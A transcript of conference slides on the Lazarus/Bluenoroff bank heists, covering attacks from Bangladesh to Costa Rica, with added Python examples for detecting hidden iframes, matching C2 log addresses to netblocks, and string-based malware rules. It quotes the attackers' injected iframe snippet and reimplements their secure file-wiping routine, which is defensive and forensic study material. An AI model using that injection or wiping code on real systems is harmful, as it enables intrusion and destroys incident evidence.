TRANSCRIPT
#RSAC
Vitaly Kamluk
Chasing the Bad Guys from Bangladesh to Costa Rica
Session ID: FLE-R01
Director of APAC Research Centre, Kaspersky Lab
@vkamluk
# whoami
Few words about the author
Eugene Kaspersky / Vitaly Kamluk
12+ years at Kaspersky Lab, 2 years at INTERPOL
Focus: Malware Analysis, Incident Response, Digital Forensics
Position: Head of security researchers in APAC region
#RSAC
Attacks Evolution
Quick overview and latest figures
Presenter’s Company Logo – replace or
delete on master slide
#RSAC
1NEW VIRUS EVERY HOUR
1994
1NEW VIRUS EVERY MINUTE
2006
1NEW VIRUS EVERY SECOND
2011
323,000NEW SAMPLES EVERY DAY
2017
THE SCALE OF THE THREAT
Presenter’s Company Logo – replace or
delete on master slide
THE NATURE OF THE THREAT
90%: Traditional cybercrime
9.9%: Targeted threats to organisations
0.1%: Cyber-weapons / Targeted attacks / APTs
HOW MALWARE SPREADS
• Exploit kits
• Social networks
• USB
TARGETED ATTACK RESEARCHES
2010: Stuxnet
2011: Duqu
2012: Gauss, Flame, miniFlame
2013: NetTraveler, Miniduke, RedOctober, Icefog, Winnti, Kimsuky, TeamSpy
2014: Epic Turla, CosmicDuke, Regin, Careto / The Mask, Energetic Bear / Crouching Yeti, Darkhotel
2015: Desert Falcons, Hellsing, Sofacy, Carbanak, Equation, Naikon, AnimalFarm, Duqu 2.0, Darkhotel part 2, MsnMM Campaigns, Satellite Turla, WildNeutron, BlueTermite, SpringDragon
2016: ProjectSauron, Saguaro, StrongPity, Ghoul, Fruity Armor, ScarCruft, Poseidon, Lazarus, Lurk, GCMan, Danti, Adwind, Dropping Elephant, Metel
We discover and dissect the world's most sophisticated threats
Bangladesh Hack
The story of one of the biggest cyberheists in history
THE FIRST ANNOUNCEMENTS
[figure: press headlines]
SCHEMATICS OF CYBER HEIST
[figure, shown in two builds: Attacker, Compromised Bank, Corr. Account at US Bank, Offshore Bank]
BANGLADESH BANK INCIDENT
Watershed event for SWIFT and the global financial industry
High level of sophistication / knowledge: hiding of business/application evidence
• Deletion of fraudulent payment instructions from database
• Modification of SWIFT messages (end/start of day statements)
• Bypass of integrity verification checks
SWIFT Customer Security Programme
NOTES FROM SWIFT
• The SWIFT Network and connections to the SWIFT network have not been compromised
• SWIFT does not rely on the customer's security to secure the SWIFT Network
• Each customer is responsible and accountable for protecting its local environment and access to SWIFT
LAZARUS!
What is this Lazarus actor?
SONY PICTURES INCIDENT (2014)
OPERATION BLOCKBUSTER (2016)
Credits: Novetta
PREVIOUS CAMPAIGNS
Courtesy of Novetta
BUT WAS IT REALLY LAZARUS?
Let's find that out
PREVIOUS RESEARCH
[figure: attribution graph, 2015 to 2017, with nodes Lazarus, Vietnam, Bangladesh, Philippines, Poland; edges labelled Wiper, Wiper, Wiper, Text String, Compromised webserver, and "? ? ?"]
A BETTER PROOF
[figure: the same graph extended with South East Asia; Poland, Mexico, and others; Africa, Costa Rica. The links now rest on code-level evidence: Patched files, Config file format, Operation time; Overall design, C2 Protocol, Own PE-loader, Import resolution; Trace format, RC4 key]
WORLDWIDE DETECTIONS
Countries: Bangladesh, Taiwan, Vietnam, Thailand, Iraq, Malaysia, Indonesia, India, Poland, Ethiopia, Nigeria, Gabon, Kenya, Uruguay, Mexico, Chile, Brazil, Costa Rica
Victims: Banks, Casinos, Investment Firms, Cryptocurrency Businesses
source: KSN
INFECTION VECTOR
How do they get in?
WATERING HOLE ATTACKS
[figure: Polish website, Mexican website]
MALICIOUS CODE INJECTION
    document.write("<div width='0px' height='0px'><iframe width='145px' height='146px'
        style='left:-2144px; position:absolute; top:0px;'
        src='https://[PATH]/view.jsp?pagenum=1' ..>
    </iframe></div>");
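The injected snippet above hides its iframe in two ways at once: a 0px container and an absolute position 2144px off the left edge. The following is an added example (not code from the presentation) that audits a page for iframes hidden like that. It parses static or rendered HTML, so for a document.write() injection it must run over the DOM after scripts execute. The sample page and the host example.invalid are constructed here; the slide redacts the real host as [PATH].

```python
"""Flag hidden iframes of the kind the watering-hole injection above plants.

Added example, not code from the presentation. The sample page below and the
host 'example.invalid' are constructed; the slide redacts the real host.
"""
import re
from html.parser import HTMLParser

# Constructed sample: one benign embed, one injection shaped like the slide's snippet.
SAMPLE_HTML = """
<html><body>
<h1>Ministry news</h1>
<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>
<div width='0px' height='0px'><iframe width='145px' height='146px'
 style='left:-2144px; position:absolute; top:0px;'
 src='https://example.invalid/view.jsp?pagenum=1'></iframe></div>
</body></html>
"""

VOID_TAGS = {"img", "br", "meta", "link", "input", "hr", "source"}
_PX = re.compile(r"(-?\d+)\s*px")


def _px(value):
    """'-2144px' -> -2144; None when the value is missing or not in pixels."""
    m = _PX.search(value) if value else None
    return int(m.group(1)) if m else None


def _style(value):
    """Parse an inline style attribute into a lower-cased dict."""
    out = {}
    for part in (value or "").split(";"):
        if ":" in part:
            k, v = part.split(":", 1)
            out[k.strip().lower()] = v.strip().lower()
    return out


class IframeAuditor(HTMLParser):
    """Record every <iframe> together with the attributes of its parent element."""

    def __init__(self):
        super().__init__()
        self.open = []        # attribute dicts of currently open elements
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "iframe":
            parent = self.open[-1] if self.open else {}
            self.findings.append(self._judge(attrs, parent))
        if tag not in VOID_TAGS:
            self.open.append(attrs)

    def handle_endtag(self, tag):
        if self.open:
            self.open.pop()

    @staticmethod
    def _judge(attrs, parent):
        st = _style(attrs.get("style"))
        reasons = []
        for prop in ("left", "top"):               # pushed far off-screen
            v = _px(st.get(prop))
            if v is not None and v < -1000:
                reasons.append(f"{prop}={v}px")
        if reasons and st.get("position") == "absolute":
            reasons.append("position:absolute")
        if _px(parent.get("width")) == 0 or _px(parent.get("height")) == 0:
            reasons.append("zero-size parent")      # 0px container hides the frame
        if st.get("display") == "none" or st.get("visibility") == "hidden":
            reasons.append("hidden")
        return {"src": attrs.get("src") or "", "reasons": reasons}


def find_hidden_iframes(html):
    """Return the iframes that look deliberately hidden, each with its reasons."""
    auditor = IframeAuditor()
    auditor.feed(html)
    return [f for f in auditor.findings if f["reasons"]]


if __name__ == "__main__":
    for hit in find_hidden_iframes(SAMPLE_HTML):
        print(hit["src"], "->", ", ".join(hit["reasons"]))
```

The thresholds (anything positioned beyond -1000px, any 0px parent) are a deliberate choice for triage, not a rule from the page: legitimate pages rarely position an iframe thousands of pixels off-screen, so a hit is worth a look even when the src looks like an ordinary JSP page.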
SITE REDIRECTION
[figure: Visitors of a Government website are sent through an iframe to another compromised website hosting the JScript Exploit; a Target List controls who receives it]
MAP OF TARGETS
[figure: world map]
OTHER TARGETS
Who else do they hit?
More illegal profit
• Mining cryptocurrency on other compromised hosts
• Two crypto-currency businesses compromised
• 63+ ATMs were infected in South Korea
• Two Korean local ATM vendors breached
• EMV credit card writer software backdoored, distributed via hacking/carder forums
TACTICS
Some of the interesting techniques
ANTI-FORENSIC TECHNIQUES
• Wiping files securely:
  • overwrite file with random pattern;
  • rename file to a random name;
  • delete the file using system API;
  • repeatedly create and delete new files.
• Wiping registry values securely:
  • overwrite value with random pattern;
  • delete the registry value;
  • apply the same to all keys recursively.
• Self-cleanup: wipe temp files, configs, components.
• Wiping prefetch files.
• Wiping event log files:
  • initiate event log backup;
  • the system releases the file lock;
  • wipe file securely.
• DLL unloading and self-removal: use a minimalistic 5Kb DLL to initiate external unloading and memory cleaning.
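To make the file-wiping sequence concrete, here is an added example (not the actors' code) that reimplements the four steps listed above in Python against a throwaway file in a temporary directory, and reports what a responder is left with afterwards. The file name bot.cfg and its contents are constructed.

```python
"""The secure file-wipe sequence described above, reimplemented as an added
example (not the actors' code). Operates only inside a temporary directory
that it creates and removes itself."""
import os
import secrets
import tempfile


def secure_wipe(path, churn=8):
    """Overwrite, rename, delete, then churn the directory. Returns the random
    name the file was deleted under and the number of bytes overwritten."""
    size = os.path.getsize(path)
    with open(path, "r+b") as fh:
        fh.write(secrets.token_bytes(size))      # 1. random pattern over the content
        fh.flush()
        os.fsync(fh.fileno())
    directory = os.path.dirname(path)
    random_name = os.path.join(directory, secrets.token_hex(8))
    os.replace(path, random_name)                # 2. original name leaves the directory
    os.remove(random_name)                       # 3. plain delete through the OS API
    for _ in range(churn):                       # 4. create/delete to recycle entries
        junk = os.path.join(directory, secrets.token_hex(8))
        with open(junk, "wb") as fh:
            fh.write(secrets.token_bytes(512))
        os.remove(junk)
    return {"deleted_as": os.path.basename(random_name), "bytes_overwritten": size}


def demo():
    """Create a throwaway config file, wipe it, and report what is left."""
    tmp = tempfile.mkdtemp()
    cfg = os.path.join(tmp, "bot.cfg")
    with open(cfg, "wb") as fh:                  # constructed sample content
        fh.write(b"c2=https://example.invalid\nkey=" + b"A" * 32 + b"\n")
    record = secure_wipe(cfg)
    record["original_gone"] = not os.path.exists(cfg)
    record["dir_empty"] = os.listdir(tmp) == []
    os.rmdir(tmp)
    return record


if __name__ == "__main__":
    print(demo())
```

Two caveats matter for the forensic side. Overwriting in place only destroys the data where the file system really writes in place; on copy-on-write file systems and on SSDs with wear levelling the old blocks can survive the overwrite. And the sequence itself is noisy: on NTFS the rename to a 16-hex-character name, the delete, and the burst of short-lived files all land in the USN change journal, which is exactly the kind of trace to hunt for after an incident.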
ANTI-FORENSIC TECHNIQUES (continued)
Password Protection: 20-31 alpha-numeric characters. Discovered passwords: [shown on slide]
Component Isolation [figure: Loader, Encrypted Payload, Keylogger; Internal IT system vs. Isolated subnet for SWIFT; steps 1, 2, 3]
WHO ARE THEY?
What else we know about them
BLUENOROFF: A LAZARUS UNIT
[figure: Lazarus with Bluenoroff as a sub-unit; activities shown: Cyber Espionage, Cyber Sabotage, Money Theft, Data Exfiltration, DoS, C2 Operation, Infiltration, Backdoors Development, Wiping Attacks, Cryptocurrency Mining]
COMPARING THE CODE
LAZARUS CODE | BLUENOROFF CODE
No obfuscation | Custom code obfuscator
Standard import resolution | Obscured import resolution
Non-packed code* | Commercial packers (e.g. Enigma, Obsidium)
No network communication | Communication with C2 + infrastructure support
Secure file-wiping | Full scale of anti-forensics
English language | Korean + English language
Execution tracing | No execution tracing
Regular engineering operation | Disguise and stealth
No visible false flags | False flag operations
Never used VirusTotal | Uses VirusTotal
LANGUAGE ARTEFACTS
Some Not Bad English (trace and log strings from the samples):
    execute_nroff(%s) - success with exit_code=%08X
    copying to %s failed with error=%d
    [FOXIT_READER] : Successfully copied to %s
    PDFModulation failed, so logclear will be executed.
    Executing real foxit reader with CommandLine = %s.
    [LOG_CLEAR] : failed to delete source file.
    Receiver :
    Sender :
    DO_NOT_USE_MM
    execute_nroff(%s) - success with exit_code=%08X
    execute_nroff(%s) - failed with error=%d
    copy failed [%s]-[%s] with error = %d
    copy success [%s]-[%s]
    backup_file(%s, %s, %d)=%d
    PatchMemory(%s, %d)
    [WorkMemory] pid=%d, name=%s
Korean Locale
FALSE FLAGS (transliterated Russian words used as identifiers)
1. Exploit code: chainik babaLEna geigeigei3raza daiadreschainika
2. Enigma Protector
3. Backdoor commands: kliyent2pond klyuchit ssylka ustanavlivat poluchit pereslat derzhat vykhodit Nachalo
THE BIGGEST OPSEC FAILURE
From the server logs of a C2 in Europe:
    2017-01-18 02:54: Apache Tomcat started on port 8080
    2017-01-18 04:10: HTTP GET view.jsp (via VPN in France)
    2017-01-18 04:10: Testing bot (via VPN in France)
    ...
    2017-01-18 08:12: Testing bot (via VPN in Korea)
    ...
    2017-01-18 11:12: Testing bot (from IP in North Korea)
175.45.***.***
    inetnum: 175.45.176.0 - 175.45.179.255
    netname: STAR-KP
    descr: Ryugyong-dong
    descr: Potong-gang District
    role: STAR JOINT VENTURE CO LTD
    address: Ryugyong-dong Potong-gang District
    country: KP
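The finding above comes down to one routine check: every client address in the C2's access log compared against a registry netblock. The following added example (not the tooling from the investigation) does that check in Python over log lines in the slide's format. The lines and the address 175.45.178.9 are constructed: the slide masks the real address and gives only the inetnum range from the whois record; the two VPN addresses are taken from documentation ranges.

```python
"""Match the source addresses in C2 access logs against whois netblocks.

Added example, not code from the investigation. SAMPLE_LOG and every address
in it are constructed; only the inetnum range comes from the slide."""
import ipaddress
import re
from collections import defaultdict

# whois 'inetnum' ranges that deserve an alert, as (first, last) address
WATCHLIST = {
    "STAR-KP / STAR JOINT VENTURE CO LTD, Ryugyong-dong, KP":
        ("175.45.176.0", "175.45.179.255"),
}

SAMPLE_LOG = """\
2017-01-18 02:54: Apache Tomcat started on port 8080
2017-01-18 04:10: HTTP GET view.jsp src=192.0.2.17
2017-01-18 04:10: Testing bot src=192.0.2.17
2017-01-18 08:12: Testing bot src=198.51.100.44
2017-01-18 11:12: Testing bot src=175.45.178.9
"""

LINE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}): (?P<event>.*?)(?: src=(?P<ip>\S+))?$"
)


def inetnum_to_networks(first, last):
    """Expand a whois 'first - last' range into CIDR networks."""
    return list(ipaddress.summarize_address_range(
        ipaddress.ip_address(first), ipaddress.ip_address(last)))


def classify(ip, watchlist=WATCHLIST):
    """Return the watchlist label whose range contains `ip`, or None."""
    addr = ipaddress.ip_address(ip)
    for label, (first, last) in watchlist.items():
        if any(addr in net for net in inetnum_to_networks(first, last)):
            return label
    return None


def scan_log(text, watchlist=WATCHLIST):
    """Return (hits, per-source request counts) for a log in the slide's format."""
    hits, per_source = [], defaultdict(int)
    for raw in text.splitlines():
        m = LINE.match(raw)
        if not m or not m.group("ip"):
            continue                                  # no client address on this line
        per_source[m.group("ip")] += 1
        label = classify(m.group("ip"), watchlist)
        if label:
            hits.append({"ts": m.group("ts"), "event": m.group("event"),
                         "ip": m.group("ip"), "netblock": label})
    return hits, dict(per_source)


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG)[0]:
        print(f"{h['ts']} {h['ip']} {h['event']} <- {h['netblock']}")
```

The per-source counts are the more useful output in practice: the French and Korean VPN exits show up as ordinary testers, and it is the single request from a different netblock, at an hour consistent with the other test runs, that stands out.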
RECENT CONFIRMATION
Source: Group-IB
ATTRIBUTION CONCLUSIONS
1. Someone invested a huge amount of money to frame NK (less likely).
2. A third force could be involved to help NK from the outside.
3. If this is truly North Korea, it means we know very little about their current motivation and use of cyber offense.
THE LAST DROP
One more thing…
WANNACRY
ATTRIBUTION
Visible Code Flow Similarity
OBSOLETE LIBRARY
WannaCry socket setup
Lazarus socket setup
DYNAMIC IMPORTS
API address resolution (dynamic import)
[figure: the slides in this section are side-by-side code screenshots of WannaCry and Lazarus samples]
CONCLUSIONS
• LAZARUS is one of the most aggressive and persistent APT groups.
• They have the support of dozens (or hundreds?) of people.
• Their unusual financial motivation makes them different from other actors.
• Public exposure doesn't stop them for long.
• They seem to switch to hacking and recruiting other hackers.
• They have no obligations, no code of conduct, no moral principles.
RECOMMENDATIONS
Common best practice against APT attacks:
• Make sure you update your software. TEST IT!
• Segregate your networks
• Record your netflow (or whole traffic if you can)
• Use endpoint security solutions, firewalls, etc, but DO MONITOR ALERTS.
• In case of ANY minor infection, get to the ROOT CAUSE of it.
ADVANCED RECOMMENDATIONS
Advanced techniques against APT attacks:
• Enable extensive logging (hint: deploy sysmon)
• Use honeypots and home-built deception
• Use a custom set of yara rules (hint: create your own yara rules)
• Scan network traffic
• Scan and identify reliably all new malware/adware/etc
  • Hint: sometimes "adware" is not what it seems
  • Hint: if you cannot identify the file:
    • Ask VirusTotal
    • Search online
    • Ask security researchers
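The "create your own yara rules" advice pairs naturally with the LANGUAGE ARTEFACTS slide: the trace strings there are exactly the kind of material a hand-written rule is built from. The following is an added example (not a rule from the presentation or from Kaspersky) that expresses such a rule in plain Python, with YARA's "N of them" condition and its ascii/wide string matching, so the logic can be tested without a YARA install. The two sample buffers are constructed.

```python
"""A minimal 'N of them' string rule in the spirit of the custom YARA rules
recommended above. Added example, not a rule from the presentation. The
strings come from the LANGUAGE ARTEFACTS slide; the sample buffers are
constructed."""

RULE = {
    "name": "lazarus_trace_strings_demo",
    "strings": [
        b"execute_nroff(%s) - success with exit_code=%08X",
        b"execute_nroff(%s) - failed with error=%d",
        b"PDFModulation failed, so logclear will be executed.",
        b"Executing real foxit reader with CommandLine = %s.",
        b"[LOG_CLEAR] : failed to delete source file.",
        b"backup_file(%s, %s, %d)=%d",
        b"PatchMemory(%s, %d)",
        b"[WorkMemory] pid=%d, name=%s",
    ],
    "min_matches": 3,          # like YARA's '3 of ($s*)'
}


def utf16le(s):
    """YARA's 'wide' modifier: the same string as UTF-16LE."""
    return s.decode("ascii").encode("utf-16-le")


def scan(buf, rule=RULE):
    """Return (matched, details). details lists each string that was found,
    its offset, and whether it was found as ASCII or UTF-16LE ('wide')."""
    details = []
    for s in rule["strings"]:
        for kind, needle in (("ascii", s), ("wide", utf16le(s))):
            off = buf.find(needle)
            if off != -1:
                details.append({"string": s.decode(), "offset": off, "kind": kind})
                break                                   # count each string once
    return len(details) >= rule["min_matches"], details


# Constructed samples: a fake PE body carrying three of the strings (one wide),
# and a benign file that merely mentions Foxit.
SUSPECT = (b"MZ\x90\x00" + b"\x00" * 64
           + b"PatchMemory(%s, %d)\x00"
           + utf16le(b"[WorkMemory] pid=%d, name=%s") + b"\x00\x00"
           + b"[LOG_CLEAR] : failed to delete source file.\x00")
BENIGN = b"Executing foxit reader update ... done\n"


if __name__ == "__main__":
    for name, buf in (("suspect", SUSPECT), ("benign", BENIGN)):
        matched, details = scan(buf)
        print(name, "matched" if matched else "clean",
              [(d["string"], d["offset"], d["kind"]) for d in details])
```

Requiring several strings rather than one keeps a rule like this from firing on a document that quotes a single log line, and checking the wide form matters because Windows code frequently stores format strings as UTF-16.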
HOW TO CHANGE GLOBAL SECURITY LANDSCAPE?
What we do and what you could do too.
CONNECTING PRIVATE SECTOR TO POLICE
[figure: Expert, Police]
BITSCOUT FLAVORS (size vs. features)
Minimal: 270Mb
Optimal: 350Mb
Maximal: 750Mb
REMOTE ASSISTANCE IN A NUTSHELL
[figure: Step 1, Step 2, Step 3 between the Expert, a Trusted Server with Terminal Access, and the Owner and Police at the Remote Location]
SOLVING THE PROBLEM OF TRUST
[figure: a remote system consisting of the Physical host with the Real HDD and a Virtual host with a Virtual HDD; the Expert holds a Root shell; Owner and Police]
BITSCOUT FEATURES
• Minimal and robust
• Runs on any old and new hardware
• Records remote user sessions
• Device access authorized by the owner
• Provides multi-user sessions
• Perfect for education
• Lets you build YOUR OWN OS!
• FREE for all and OPEN-SOURCE!
Download Bitscout here: github.com/vitaly-kamluk
THANK YOU!
Vitaly Kamluk, Kaspersky Lab
@vkamluk
github.com/vitaly-kamluk